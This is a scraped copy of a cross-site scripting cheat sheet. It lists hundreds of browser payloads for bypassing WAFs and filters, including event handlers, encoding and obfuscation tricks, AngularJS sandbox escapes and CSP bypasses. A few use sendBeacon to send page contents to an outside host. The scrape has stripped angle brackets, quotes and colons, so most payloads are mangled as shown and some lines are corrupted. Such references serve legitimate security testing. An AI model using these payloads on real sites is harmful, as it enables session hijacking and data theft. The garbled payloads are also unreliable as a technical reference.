Cross-site scripting (XSS) cheat sheetThis cross-site scripting (XSS) cheat sheet contains many vectors that can help you bypass WAFs and filters You can select vectors by the event tag orbrowser and a proof of concept is included for every vector This cheat sheet is regularly updated in 2020 Last updated Fri 07 Aug 2020 144908 +0000

Table of contents

Event handlers

Event handlers that do not require user interaction

Event Description Code

onactivate

Fires when the element is activated ltxss id=x tabindex=1 onactivate=alert(1)gtltxssgtCompatibility

onafterprint

Fires after the page is printed ltbody onafterprint=alert(1)gtCompatibility

onafterscriptexecute

Fires after script is executed ltxss onafterscriptexecute=alert(1)gtltscriptgt1ltscriptgtCompatibility

onanimationcancel

Fires when a CSS animation cancels ltstylegtkeyframes xfrom left0to left 1000pxtarget animation10s ease-in-out 0s 1 xltstylegtltxss id=x style=positionabsolute onanimationcancel=alert(1)gtltxssgt

Compatibility

onanimationend

Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onanimationend=alert(1)gtltxssgt

Compatibility

onanimationiteration

Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onanimationiteration=alert(1)gtltxssgt

Compatibility

onanimationstart

Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onanimationstart=alert(1)gtltxssgt

Compatibility

onbeforeactivate

Fires before the element is activated ltxss id=x tabindex=1 onbeforeactivate=alert(1)gtltxssgtCompatibility

onbeforedeactivate

Fires before the element is deactivated ltxss id=x tabindex=1 onbeforedeactivate=alert(1)gtltxssgtltinput autofocusgtCompatibility

onbeforeprint

Fires before the page is printed ltbody onbeforeprint=alert(1)gtCompatibility

onbeforescriptexecute

Fires before script is executed ltxss onbeforescriptexecute=alert(1)gtltscriptgt1ltscriptgtCompatibility

onbeforeunload

Fires after if the url changes ltbody onbeforeunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt

Compatibility

onbegin

Fires when a svg animation begins ltsvggtltanimate onbegin=alert(1) attributeName=x dur=1sgtCompatibility

onblur

Fires when an element loses focus lta onblur=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility

onbounce

Fires when the marquee bounces ltmarquee width=1 loop=1 onbounce=alert(1)gtXSSltmarqueegtCompatibility

oncanplay

Fires if the resource can be played ltaudio oncanplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

oncanplaythrough

Fires when enough data has been loadedto play the resource all the way through

ltvideo oncanplaythrough=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt

Compatibility

oncuechange

Fires when subtitle changes ltvideo controlsgtltsource src=validvideomp4 type=videomp4gtlttrack default oncuechange=alert(1) src=datatextvttWEBVTT FILE 1 000000000 --gt 000005000 ltbgtXSSltbgt gtltvideogt

Compatibility

ondeactivate

Fires when the element is deactivated ltxss id=x tabindex=1 ondeactivate=alert(1)gtltxssgtltinput id=y autofocusgtCompatibility

ondurationchange

Fires when duration changes ltaudio controls ondurationchange=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt

Compatibility

onend

Fires when a svg animation ends ltsvggtltanimate onend=alert(1) attributeName=x dur=1sgtCompatibility

onended

Fires when the resource is finishedplaying

ltaudio controls autoplay onended=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onerror

Fires when the resource fails to load orcauses an error

ltaudio srconerror=alert(1)gtCompatibility

onfinish

Fires when the marquee finishes ltmarquee width=1 loop=1 onfinish=alert(1)gtXSSltmarqueegtCompatibility

onfocus

Fires when the element has focus lta id=x tabindex=1 onfocus=alert(1)gtltagtCompatibility

onfocusin

Fires when the element has focus lta id=x tabindex=1 onfocusin=alert(1)gtltagtCompatibility

onfocusout

Fires when an element loses focus lta onfocusout=alert(1) tabindex=1 id=xgtltagtltinput autofocusgtCompatibility

onhashchange

Fires if the hash changes ltbody onhashchange=alert(1)gtCompatibility

onload

Fires when the element is loaded ltbody onload=alert(1)gtCompatibility

onloadeddata

Fires when the first frame is loaded ltaudio onloadeddata=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onloadedmetadata

Fires when the meta data is loaded ltaudio autoplay onloadedmetadata=alert(1)gt ltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onloadend

Fires when the element finishes loading ltimage src=validimagepng onloadend=alert(1)gtCompatibility

onloadstart

Fires when the element begins to load ltimage src=validimagepng onloadstart=alert(1)gtCompatibility

onmessage

Fires when message event is receivedfrom a postMessage call

ltbody onmessage=alert(1)gtCompatibility

onpageshow

Fires when the page is shown ltbody onpageshow=alert(1)gtCompatibility

onplay

Fires when the resource is played ltaudio autoplay onplay=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onplaying

Fires the resource is playing ltaudio autoplay onplaying=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onpopstate

Fires when the history changes ltbody onpopstate=alert(1)gtCompatibility

onprogress

Fires when the videoaudio beginsdownloading

ltaudio controls onprogress=alert(1)gtltsource src=validaudiomp3 type=audiompeggtltaudiogt

Compatibility

onreadystatechange

Fires when the ready state changes ltapplet onreadystatechange=alert(1)gtltappletgtCompatibility

onrepeat

Fires when a svg animation repeats ltsvggtltanimate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 gtCompatibility

onresize

Fires when the window is resized ltbody onresize=alert(1)gtCompatibility

onscroll

Fires when the page scrolls ltbody onscroll=alert(1)gtltdiv style=height1000pxgtltdivgtltdiv id=xgtltdivgtCompatibility

onstart

Fires when the marquee starts ltmarquee onstart=alert(1)gtXSSltmarqueegtCompatibility

ontimeupdate

Fires when the timeline is changed ltaudio controls autoplay ontimeupdate=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

ontoggle

Fires when the details tag is expanded ltdetails ontoggle=alert(1) opengttestltdetailsgtCompatibility

ontransitioncancel

Fires when a CSS transition cancels ltstylegttarget color redltstylegtltxss id=x style=transitioncolor 10s ontransitioncancel=alert(1)gtltxssgt

Compatibility

ontransitionend

Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionend=alert(1)gtltxssgt

Compatibility

ontransitionrun

Fires when a CSS transition begins ltstylegttarget transform rotate(180deg)ltstylegtltxss id=x style=transitiontransform 2s ontransitionrun=alert(1)gtltxssgt

Compatibility

ontransitionstart

Fires when a CSS transition starts ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s ontransitionstart=alert(1)gtltxssgt

Compatibility

onunhandledrejection

Fires when a promise isnt handled ltbody onunhandledrejection=alert(1)gtltscriptgtfetch(xyz)ltscriptgtCompatibility

onunload

Fires when the page is unloaded ltbody onunload=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt

Compatibility

onwaiting

Fires when while waiting for the data ltvideo autoplay controls onwaiting=alert(1)gtltsource src=validvideomp4 type=videomp4gtltvideogt

Compatibility

onwebkitanimationend

Fires when a CSS animation ends ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationend=alert(1)gtltxssgt

Compatibility

onwebkitanimationiteration

Fires when a CSS animation repeats ltstylegtkeyframes slidein ltstylegtltxss style=animation-duration1sanimation-nameslideinanimation-iteration-count2 onwebkitanimationiteration=alert(1)gtltxssgt

Compatibility

onwebkitanimationstart

Fires when a CSS animation starts ltstylegtkeyframes xltstylegtltxss style=animation-namex onwebkitanimationstart=alert(1)gtltxssgt

Compatibility

onwebkittransitionend

Fires when a CSS transition ends ltstylegttarget colorredltstylegtltxss id=x style=transitioncolor 1s onwebkittransitionend=alert(1)gtltxssgt

Compatibility

Event handlers that do require user interaction

Event Description Code

onauxclick

Fires when right clicking or using themiddle button of the mouse

ltinput onauxclick=alert(1)gtCompatibility

onbeforecopy

Requires you copy a piece of text lta onbeforecopy=alert(1) contenteditablegttestltagtCompatibility

onbeforecut

Requires you cut a piece of text lta onbeforecut=alert(1) contenteditablegttestltagtCompatibility

onbeforepaste

Requires you paste a piece of text lta onbeforepaste=alert(1) contenteditablegttestltagtCompatibility

onchange

Requires as change of value ltinput onchange=alert(1) value=xssgtCompatibility

onclick

Requires a click of the element ltxss onclick=alert(1)gttestltxssgtCompatibility

onclose

Fires when a dialog is closed ltdialog open onclose=alert(1)gtltform method=dialoggtltbuttongtXSSltbuttongtltformgt

Compatibility

oncontextmenu

Triggered when right clicking to show thecontext menu

ltxss oncontextmenu=alert(1)gttestltxssgtCompatibility

oncopy

Requires you copy a piece of text ltxss oncopy=alert(1) value=XSS autofocus tabindex=1gttestCompatibility

oncut

Requires you cut a piece of text ltxss oncut=alert(1) value=XSS autofocus tabindex=1gttestCompatibility

ondblclick

Triggered when double clicking theelement

ltxss ondblclick=alert(1) autofocus tabindex=1gttestltxssgtCompatibility

ondrag

Triggered dragging the element ltxss draggable=true ondrag=alert(1)gttestltxssgtCompatibility

ondragend

Triggered dragging is finished on theelement

ltxss draggable=true ondragend=alert(1)gttestltxssgtCompatibility

ondragenter

Requires a mouse drag ltxss draggable=true ondragenter=alert(1)gttestltxssgtCompatibility

ondragleave

Requires a mouse drag ltxss draggable=true ondragleave=alert(1)gttestltxssgtCompatibility

ondragover

Triggered dragging over an element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondragover=alert(1) contenteditablegtdrop hereltxssgt

Compatibility

ondragstart

Requires a mouse drag ltxss draggable=true ondragstart=alert(1)gttestltxssgtCompatibility

ondrop

Triggered dropping a draggable element ltdiv draggable=true contenteditablegtdrag meltdivgtltxss ondrop=alert(1) contenteditablegtdrop hereltxssgt

Compatibility

onfullscreenchange

Fires when a video changes full screenstatus

ltvideo onfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility

oninput

Requires as change of value ltinput oninput=alert(1) value=xssgtCompatibility

oninvalid

Requires a form submission with anelement that does not satisfy itsconstraints such as a required attribute

ltformgtltinput oninvalid=alert(1) requiredgtltinput type=submitgtCompatibility

onkeydown

Triggered when a key is pressed ltxss onkeydown=alert(1) contenteditablegttestltxssgtCompatibility

onkeypress

Triggered when a key is pressed ltxss onkeypress=alert(1) contenteditablegttestltxssgtCompatibility

onkeyup

Triggered when a key is released ltxss onkeyup=alert(1) contenteditablegttestltxssgtCompatibility

onmousedown

Triggered when the mouse is pressed ltxss onmousedown=alert(1)gttestltxssgtCompatibility

onmouseenter

Triggered when the mouse is hoveredover the element

ltxss onmouseenter=alert(1)gttestltxssgtCompatibility

onmouseleave

Triggered when the mouse is movedaway from the element

ltxss onmouseleave=alert(1)gttestltxssgtCompatibility

onmousemove

Requires mouse movement ltxss onmousemove=alert(1)gttestltxssgtCompatibility

onmouseout

Triggered when the mouse is movedaway from the element

ltxss onmouseout=alert(1)gttestltxssgtCompatibility

onmouseover

Requires a hover over the element ltxss onmouseover=alert(1)gttestltxssgtCompatibility

onmouseup

Triggered when the mouse button isreleased

ltxss onmouseup=alert(1)gttestltxssgtCompatibility

onmousewheel

Fires when the mousewheel scrolls ltxss onmousewheel=alert(1)gtrequires scrollingCompatibility

onmozfullscreenchange

Fires when a video changes full screenstatus

ltvideo onmozfullscreenchange=alert(1) src=validvideomp4 controlsgtCompatibility

onpagehide

Fires when the page is changed ltbody onpagehide=navigatorsendBeacon(httpssslportswigger-labsnetdocumentbodyinnerHTML)gt

Compatibility

onpaste

Requires you paste a piece of text lta onpaste=alert(1) contenteditablegttestltagtCompatibility

onpause

Requires clicking the element to pause ltaudio autoplay controls onpause=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onpointerdown

Fires when the mouse down ltxss onpointerdown=alert(1)gtXSSltxssgtCompatibility

onpointerenter

Fires when the mouseenter ltxss onpointerenter=alert(1)gtXSSltxssgtCompatibility

onpointerleave

Fires when the mouseleave ltxss onpointerleave=alert(1)gtXSSltxssgtCompatibility

onpointermove

Fires when the mouse move ltxss onpointermove=alert(1)gtXSSltxssgtCompatibility

onpointerout

Fires when the mouse out ltxss onpointerout=alert(1)gtXSSltxssgtCompatibility

onpointerover

Fires when the mouseover ltxss onpointerover=alert(1)gtXSSltxssgtCompatibility

onpointerrawupdate

Fires when the pointer changes ltxss onpointerrawupdate=alert(1)gtXSSltxssgtCompatibility

onpointerup

Fires when the mouse up ltxss onpointerup=alert(1)gtXSSltxssgtCompatibility

onreset

Requires a click ltform onreset=alert(1)gtltinput type=resetgtCompatibility

onsearch

Fires when a form is submitted and theinput has a type attribute of search

ltformgtltinput type=search onsearch=alert(1) value=Hit return autofocusgtCompatibility

onseeked

Requires clicking the element timeline ltaudio autoplay controls onseeked=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onseeking

Requires clicking the element timeline ltaudio autoplay controls onseeking=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onselect

Requires you select text ltinput onselect=alert(1) value=XSS autofocusgtCompatibility

onselectionchange

Fires when text selection is changed onthe page

ltbody onselectionchange=alert(1)gtselect some textCompatibility

onselectstart

Fires when beginning a text selection ltbody onselectstart=alert(1)gtselect some textCompatibility

onshow

Fires context menu is shown ltdiv contextmenu=xssgtltpgtRight clickltmenu type=context id=xss onshow=alert(1)gtltmenugtltdivgt

Compatibility

onsubmit

Requires a form submission ltform onsubmit=alert(1)gtltinput type=submitgtCompatibility

ontouchend

Fires when the touch screen only mobiledevice

ltbody ontouchend=alert(1)gt Compatibility

ontouchmove

Fires when the touch screen and moveonly mobile device

ltbody ontouchmove=alert(1)gt Compatibility

ontouchstart

Fires when the touch screen only mobiledevice

ltbody ontouchstart=alert(1)gt Compatibility

onvolumechange

Requires volume adjustment ltaudio autoplay controls onvolumechange=alert(1)gtltsource src=validaudiowav type=audiowavgtltaudiogt

Compatibility

onwheel

Fires when you use the mouse wheel ltbody onwheel=alert(1)gtCompatibility

Restricted characters

No parentheses using exception handling ltscriptgtonerror=alertthrow 1ltscriptgt

No parentheses using exception handling no semicolons

ltscriptgtonerror=alertthrow 1ltscriptgt

No parentheses using exception handling no semicolons using expressions

ltscriptgtthrow onerror=alert1ltscriptgt

No parentheses using exception handling and eval ltscriptgtthrow onerror=eval=alertx281x29ltscriptgt

No parentheses using exception handling and evalon Firefox

ltscriptgtonerror=evalthrowlineNumber1columnNumber1fileName1messagealertx281x29ltscriptgt

No parentheses using ES6 hasInstance andinstanceof with eval

ltscriptgtalertx281x29instanceof[SymbolhasInstance]evalltscriptgt

No parentheses using ES6 hasInstance andinstanceof with eval without

ltscriptgtalertx281x29instanceof[Symbol[hasInstance]]evalltscriptgt

No parentheses using location redirect ltscriptgtlocation=javascriptalertx281x29ltscriptgt

No parentheses using location redirect no strings ltscriptgtlocation=nameltscriptgt

No parentheses using template strings ltscriptgtalert`1`ltscriptgt

No parentheses using template strings and locationhash

ltscriptgtnew Function`X$documentlocationhashsubstr`1``ltscriptgt

No parentheses or spaces using template stringsand location hash

ltscriptgtFunction`X$documentlocationhashsubstr`1````ltscriptgt

Frameworks

Bootstrap onanimationstart event ltxss class=progress-bar-animated onanimationstart=alert(1)gt

Bootstrap ontransitionend event ltxss class=carousel slide data-ride=carousel data-interval=100 ontransitionend=alert(1)gtltxss class=carousel-innergtltxss class=carousel-item activegtltxssgtltxss class=carousel-itemgtltxssgtltxssgtltxssgt

Protocols

Iframe src attribute JavaScript protocol ltiframe src=javascriptalert(1)gt

Object data attribute with JavaScript protocol ltobject data=javascriptalert(1)gt

Embed src attribute with JavaScript protocol ltembed src=javascriptalert(1)gt

A standard JavaScript protocol lta href=javascriptalert(1)gtXSSltagt

The protocol is not case sensitive lta href=JaVaScriptalert(1)gtXSSltagt

Characters x01-x20 are allowed before the protocol lta href= javascriptalert(1)gtXSSltagt

Characters x09x0ax0d are allowed inside theprotocol

lta href=javas criptalert(1)gtXSSltagt

Characters x09x0ax0d are allowed after protocolname before the colon

lta href=javascript alert(1)gtXSSltagt

Xlink namespace inside SVG with JavaScriptprotocol

ltsvggtlta xlinkhref=javascriptalert(1)gtlttext x=20 y=20gtXSSlttextgtltagt

SVG animate tag using values ltsvggtltanimate xlinkhref=xss attributeName=href values=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

SVG animate tag using to ltsvggtltanimate xlinkhref=xss attributeName=href from=javascriptalert(1) to=1 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

to 1 a id xss text x 20 y 20 XSS text a

SVG set tag ltsvggtltset xlinkhref=xss attributeName=href from= to=javascriptalert(1) gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

Data protocol inside script src ltscript src=datatextjavascriptalert(1)gtltscriptgt

SVG script href attribute without closing script tag ltsvggtltscript href=datatextjavascriptalert(1) gt

SVG use element ChromeFirefox ltsvggtltuse href=dataimagesvg+xmlltsvg id=x xmlns=httpwwww3org2000svg xmlnsxlink=httpwwww3org1999xlink width=100 height=100gtlta xlinkhref=javascriptalert(1)gtltrect x=0 y=0 width=100 height=100 gtltagtltsvggtxgtltusegtltsvggt

Import statement with data URL ltscriptgtimport(datatextjavascriptalert(1))ltscriptgt

Base tag with JavaScript protocol rewriting relativeURLS

ltbase href=javascripta-alert(1)gtlta href=lolsafarihtmlgttestltagt

MathML makes any tag clickable ltmathgtltx href=javascriptalert(1)gtblah

Button and formaction ltformgtltbutton formaction=javascriptalert(1)gtXSS

Input and formaction ltformgtltinput type=submit formaction=javascriptalert(1) value=XSSgt

Form and action ltform action=javascriptalert(1)gtltinput type=submit value=XSSgt

Use element with an external URL ltsvggtltuse href=subdomain1portswigger-labsnetuse_elementuploadphpx gtltsvggt

Animate tag with keytimes and multiple values ltsvggtltanimate xlinkhref=xss attributeName=href dur=5s repeatCount=indefinite keytimes=001 values=httpsportswiggernetampsemijavascriptalert(1)ampsemi0 gtlta id=xssgtlttext x=20 y=20gtXSSlttextgtltagt

Other useful attributes

Using srcdoc attribute ltiframe srcdoc=ltimg src=1 onerror=alert(1)gtgtltiframegt

Using srcdoc with entities ltiframe srcdoc=ampltimg src=1 onerror=alert(1)ampgtgtltiframegt

Click a submit element from anywhere on the pageeven outside the form

ltform action=javascriptalert(1)gtltinput type=submit id=xgtltformgtltlabel for=xgtXSSltlabelgt

Hidden inputs Access key attributes can enableXSS on normally unexploitable elements

ltinput type=hidden accesskey=X onclick=alert(1)gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Link elements Access key attributes can enableXSS on normally unexploitable elements

ltlink rel=canonical accesskey=X onclick=alert(1) gt (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)

Download attribute can save a copy of the currentwebpage

lta href= download=filenamehtmlgtTestltagt

Disable referrer using referrerpolicy ltimg referrerpolicy=no-referrer src=portswigger-labsnetgt

Set windowname via parameter on the windowopenfunction

lta href= onclick=windowopen(httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)alert(1))gtXSSltagt

Set windowname via name attribute in a ltiframegt ltiframe name=alert(1) src=httpsportswigger-labsnetxssxssphp

Set do a e a a e att bute a a e

tagcontext=js_string_singleampx=27eval(name)gtltiframegt

Set windowname via target attribute in a ltbasegt tag ltbase target=alert(1)gtlta href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in base tagltagt

Set windowname via target attribute in a ltagt tag lta target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtXSS via target in a tagltagt

Set windowname via usemap attribute in a ltimggttag

ltimg src=validimagepng width=10 height=10 usemap=xssgtltmap name=xssgtltarea shape=rect coords=0082126 target=alert(1) href=httpsubdomain1portswigger-labsnetxssxssphpcontext=js_string_singleampx=27eval(name)gtltmapgt

Set windowname via target attribute in a ltformgt tag ltform action=httpsubdomain1portswigger-labsnetxssxssphp target=alert(1)gtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit value=XSS via target in a formgtltformgt

Set windowname via formtarget attribute in altinputgt tag type submit

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput type=submit formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type submitgtltformgt

Set windowname via formtarget attribute in altinputgt tag type image

ltformgtltinput type=hidden name=x value=eval(name)gtltinput type=hidden name=context value=js_string_singlegtltinput name=1 type=image src=validimagepng formaction=httpsubdomain1portswigger-labsnetxssxssphp formtarget=alert(1) value=XSS via formtarget in input type imagegtltformgt

Special tags

Redirect to a different domain ltmeta http-equiv=refresh content=0 url=portswigger-labsnetgt

Meta charset attribute UTF-7 ltmeta charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

Meta charset UTF-7 ltmeta http-equiv=Content-Type content=texthtml charset=UTF-7 gt +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 1

+v8 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 2

+v9 +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 3

+v+ +ADw-script+AD4-alert(1)+ADw-script+AD4-

UTF-7 BOM characters (Has to be at the start of thedocument) 4

+v +ADw-script+AD4-alert(1)+ADw-script+AD4-

Upgrade insecure requests ltmeta http-equiv=Content-Security-Policy content=upgrade-insecure-requestsgt

Disable JavaScript via iframe sandbox ltiframe sandbox src=portswigger-labsnetgtltiframegt

Disable referer ltmeta name=referrer content=no-referrergt

Encoding

Overlong UTF-8 C0BCscriptgtalert(1)ltscriptgt E080BCscriptgtalert(1)ltscriptgt F08080BCscriptgtalert(1)ltscriptgt F8808080BCscriptgtalert(1)ltscriptgt FC80808080BCscriptgtalert(1)ltscriptgt

Unicode escapes ltscriptgtu0061lert(1)ltscriptgt

Unicode escapes ES6 style ltscriptgtu61lert(1)ltscriptgt

Unicode escapes ES6 style zero padded ltscriptgtu0000000061lert(1)ltscriptgt

Hex encoding JavaScript escapes ltscriptgteval(x61lert(1))ltscriptgt

Octal encoding ltscriptgteval(141lert(1))ltscriptgt ltscriptgteval(alert(061))ltscriptgt ltscriptgteval(alert(61))ltscriptgt

Decimal encoding with optional semi-colon lta href=amp106avascriptalert(1)gtXSSltagtlta href=amp106avascriptalert(1)gtXSSltagt

SVG script with HTML encoding ltsvggtltscriptgtamp97lert(1)ltscriptgtltsvggt ltsvggtltscriptgtampx61lert(1)ltscriptgtltsvggt ltsvggtltscriptgtalertampNewLine(1)ltscriptgtltsvggt ltsvggtltscriptgtx=ampquotalert(1)ltscriptgtltsvggt

Decimal encoding with padded zeros lta href=amp0000106avascriptalert(1)gtXSSltagt

Hex encoding entities lta href=ampx6aavascriptalert(1)gtXSSltagt

Hex encoding without semi-colon provided nextcharacter is not a-f0-9

lta href=jampx61vascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt lta href=ampx6a avascriptalert(1)gtXSSltagt

Hex encoding with padded zeros lta href=ampx0000006aavascriptalert(1)gtXSSltagt

Hex encoding is not case sensitive lta href=ampX6Aavascriptalert(1)gtXSSltagt

HTML entities lta href=javascriptampcolonalert(1)gtXSSltagt lta href=javaampTabscriptalert(1)gtXSSltagt lta href=javaampNewLinescriptalert(1)gtXSSltagt lta href=javascriptampcolonalertamplpar1amprpargtXSSltagt

URL encoding lta href=javascriptx=27-alert(1)-27gtXSSltagt

HTML entities and URL encoding lta href=javascriptx=amppercnt27-alert(1)-27gtXSSltagt

Obfuscation

Data protocol inside script src with base64 ltscript src=datatextjavascriptbase64YWxlcnQoMSk=gtltscriptgt

Data protocol inside script src with base64 andHTML entities

ltscript src=datatextjavascriptbase64ampx59ampx57ampx78ampx6campx63ampx6eampx51ampx6fampx4dampx53ampx6bampx3dgtltscriptgt

Data protocol inside script src with base64 and URLencoding

ltscript src=datatextjavascriptbase645957786c636e516f4d536b3dgtltscriptgt

Iframe srcdoc HTML encoded ltiframe srcdoc=ampltscriptampgtalertamplpar1amprparampltampsolscriptampgtgtltiframegt

Iframe JavaScript URL with HTML and URL encoding ltiframe src=javascriptampx25ampx33ampx43ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45ampx61ampx6campx65ampx72ampx74ampx28ampx31ampx29ampx25ampx33ampx43ampx25ampx32ampx46ampx73ampx63ampx72ampx69ampx70ampx74ampx25ampx33ampx45gtltiframegt

SVG script with unicode escapes and HTMLencoding

ltsvggtltscriptgtampx5campx75ampx30ampx30ampx36ampx31ampx5campx75ampx30ampx30ampx36ampx63ampx5campx75ampx30ampx30ampx36ampx35ampx5campx75ampx30ampx30ampx37ampx32ampx5campx75ampx30ampx30ampx37ampx34(1)ltscriptgtltsvggt

Client-side template injection

VueJS reflected

Version Author Length Vector

All versions Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

All versions Mario Heiderich (Cure53) ampSebastian Lekies (Google)Eduardo Vela Nava (Google)Krzysztof Kotowicz (Google)

62 ltdiv v-html=constructorconstructor(alert(1))()gtaltdivgt

All versions Gareth Heyes (PortSwigger) 39 ltx v-html=_cconstructor(alert(1))()gt

All versions Peter af Geijerstam (SwedishShellcode Factory)

37 ltx v-if=_cconstructor(alert(1))()gt

AngularJS sandbox escapes reflected

Version Author Length Vector

101 - 115 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

101 - 115(shorter)

Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)

33 $onconstructor(alert(1))()

120 - 121 Jan Horn (Google) 122 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()

122 - 125 Gareth Heyes (PortSwigger) 23 )))alert(1)

126 - 1218 Jan Horn (Google) 106 (_=sub)callcall([$=constructor]getOwnPropertyDescriptor(___proto__$)value0alert(1))()

1219 - 1223 Mathias Karlsson (Detectify) 124 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)

1224 - 1229 Gareth Heyes (PortSwigger) 23 )))alert(1)

1227-1229130-1320

Gareth Heyes (PortSwigger) 23 )))alert(1)

130 Gaacutebor Molnaacuter (Google) 272 ready ampamp (ready = true) ampamp ( call $$watchers[0]get(toStringconstructorprototype) (a = apply) ampamp (apply = constructor) ampamp (valueOf = call) ampamp (+toString( F = Functionprototype + Fapply = Fa + delete Fa + delete FvalueOf + alert(1) )))

133 - 1318 Gareth Heyes (PortSwigger) 128 [toString[]joinlength10__proto__]assign=[]joinaconstructorprototypecharAt=

[]join$eval(x=alert(1))

1319 Gareth Heyes (PortSwigger) 102 a[toStringfalsevalueOf[]joinlength10__proto__]charAt=[]join$eval(x=alert(1))

1320 Gareth Heyes (PortSwigger) 65 aconstructorprototypecharAt=[]join$eval(x=alert(1))

140 - 149 Gareth Heyes (PortSwigger) 74 aconstructorprototypecharAt=[]join$eval(x=1 alert(1))

150 - 158 Ian Hickey amp Gareth Heyes(PortSwigger)

79 x=yconstructorprototypex[y]charAt=[]join$eval(x=alert(1))

159 - 1511 Jan Horn (Google) 517 c=subcallb=subbinda=subapply c$apply=$applyc$eval=bop=$root$$phase $root$$phase=nullod=$root$digest$root$digest=()toString C=c$apply(c)$root$$phase=op$root$digest=od B=C(bcb)$evalAsync( astNode=pop()astNodetype=UnaryExpression astNodeoperator=(windowXvoid0(windowX=truealert(1)))+ astNodeargument=typeIdentifiernamefoo ) m1=B($$asyncQueuepop()expressionnull$root) m2=B(Cnullm1)[]pushapply=m2a=sub $eval(a(bc))[]pushapply=a

gt=160 Mario Heiderich (Cure53) 41 constructorconstructor(alert(1))()

gt=160 (shorter) Gareth Heyes (PortSwigger) ampLewis Ardern (Synopsys)

33 $onconstructor(alert(1))()

DOM based AngularJS sandbox escapes (Using orderBy or no $eval)

Version Author Length Vector

101 - 115 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()

120 - 1218 Jan Horn (Google) 118 a=constructorb=asubcallcall(b[a]getOwnPropertyDescriptor(b[a]getPrototypeOf(asub)a)value0alert(1))()

1219 - 1223 Mathias Karlsson (Detectify) 119 toStringconstructorprototypetoString=toStringconstructorprototypecall[aalert(1)]sort(toStringconstructor)

1224 - 1226 Gareth Heyes (PortSwigger) 317 [[__proto__]][x]=constructorgetOwnPropertyDescriptorg=[[__proto__]][x][[__proto__]][y]=g(sub[[__proto__]]constructor)[[__proto__]][z]=constructordefinePropertyd=[[__proto__]][z]d(sub[[__proto__]]constructorvaluefalse)[[__proto__]][y]value(alert(1))()

1227-1229130-1320

Gareth Heyes (PortSwigger) 20 )))alert(1)

140-145 Gareth Heyes (PortSwigger) 75 aconstructorprototypecharAt=[]join[1]|orderByx=1 alert(1)

gt=160 Mario Heiderich (Cure53) 37 constructorconstructor(alert(1))()

144 (withoutstrings)

Gareth Heyes (PortSwigger) 134 toString()constructorprototypecharAt=[]join [12]|orderBytoString()constructorfromCharCode(1206197108101114116404941)

AngularJS CSP bypasses

Version Author Length Vector

All versions(Chrome)

Gareth Heyes (PortSwigger) 81 ltinput autofocus ng-focus=$eventpath|orderBy[]constructorfrom([1]alert)gt

All versions(Chrome)shorter

Gareth Heyes (PortSwigger) 56 ltinput id=x ng-focus=$eventpath|orderBy(z=alert)(1)gt

All versions (allbrowsers)shorter

Gareth Heyes (PortSwigger) 91 ltinput autofocus ng-focus=$eventcomposedPath()|orderBy[]constructorfrom([1]alert)gt

120 - 150 Eduardo Vela (Google) 190 ltdiv ng-app ng-cspgtltdiv ng-focus=x=$event id=f tabindex=0gtfooltdivgtltdiv ng-repeat=(key value) in xviewgtltdiv ng-if=key == windowgt [1]reduce(valuealert 1) ltdivgtltdivgtltdivgt

All versions(Chrome)shorter via oncut

